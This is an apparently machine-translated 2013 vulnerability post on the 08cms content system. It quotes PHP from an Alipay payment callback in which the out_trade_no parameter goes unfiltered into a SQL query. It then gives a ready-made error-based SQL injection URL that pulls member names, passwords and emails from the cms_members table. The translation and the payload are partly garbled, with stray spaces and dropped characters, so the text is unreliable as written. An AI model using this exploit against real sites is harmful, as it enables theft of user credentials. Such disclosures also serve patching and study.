08cms SQL injection vulnerability analysis and the use of the EXP-bug warning-the black bar safety net

ID MYHACK58:62201340359
Type myhack58
Reporter 佚名
Modified 2013-08-31T00:00:00




/ Class name: alipay_notify Function: payment process Server Notification class Detailed: this page is to inform returning core processing the file, no need to modify Version: 3.1 Modify date: 2010-10-29 'Description: 'Following code just for the convenience of the merchants of the test and provide sample code, The Merchant can according to your website needs, in accordance with the technical documentation,not be sure to use the code. 'This code is only for learning and research the PayPal interface, just provide a reference. */ require_once("class/alipay_notify.php"); empty($_POST) && $_POST = &$_GET; require_once('../pay_base.php'); contains a towering $pay = new pay_base('alipay'); // instantiate $pay->by = 'pays'; //we look inside is supposed to write the $pay->order_sn = $_POST['out_trade_no']; //look here didn't filter it into the if(!$ pay->getData()){ // get data //log_result ("order_failed"); exit("fail"); } ........ function getData(){ ......... switch($this->by){ case 'pays': $sql1 = "SELECT pid as order_id,mid,amount as totalfee FROM {$tblprefix}pays WHERE ordersn='$this->order_sn'"; in here $this->status = 0; break; ....................................... if($sql1 && $tmp = $db->fetch_one($sql1)){ // inject if(empty($key) || empty($tmp[$key]) || empty($sql2)){

EXP: the

/include/paygate/alipay/pays. php? out_trade_no=2 2'%20AND%2 0(SELECT%2 0 1%20FROM(SELECT%20COUNT(),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)2))X%20FROM%20information_schema. tables%20GROUP%20BY%20X)a)%20AND'


Excerpts from: http://www.unhonker.com/bug/1387.html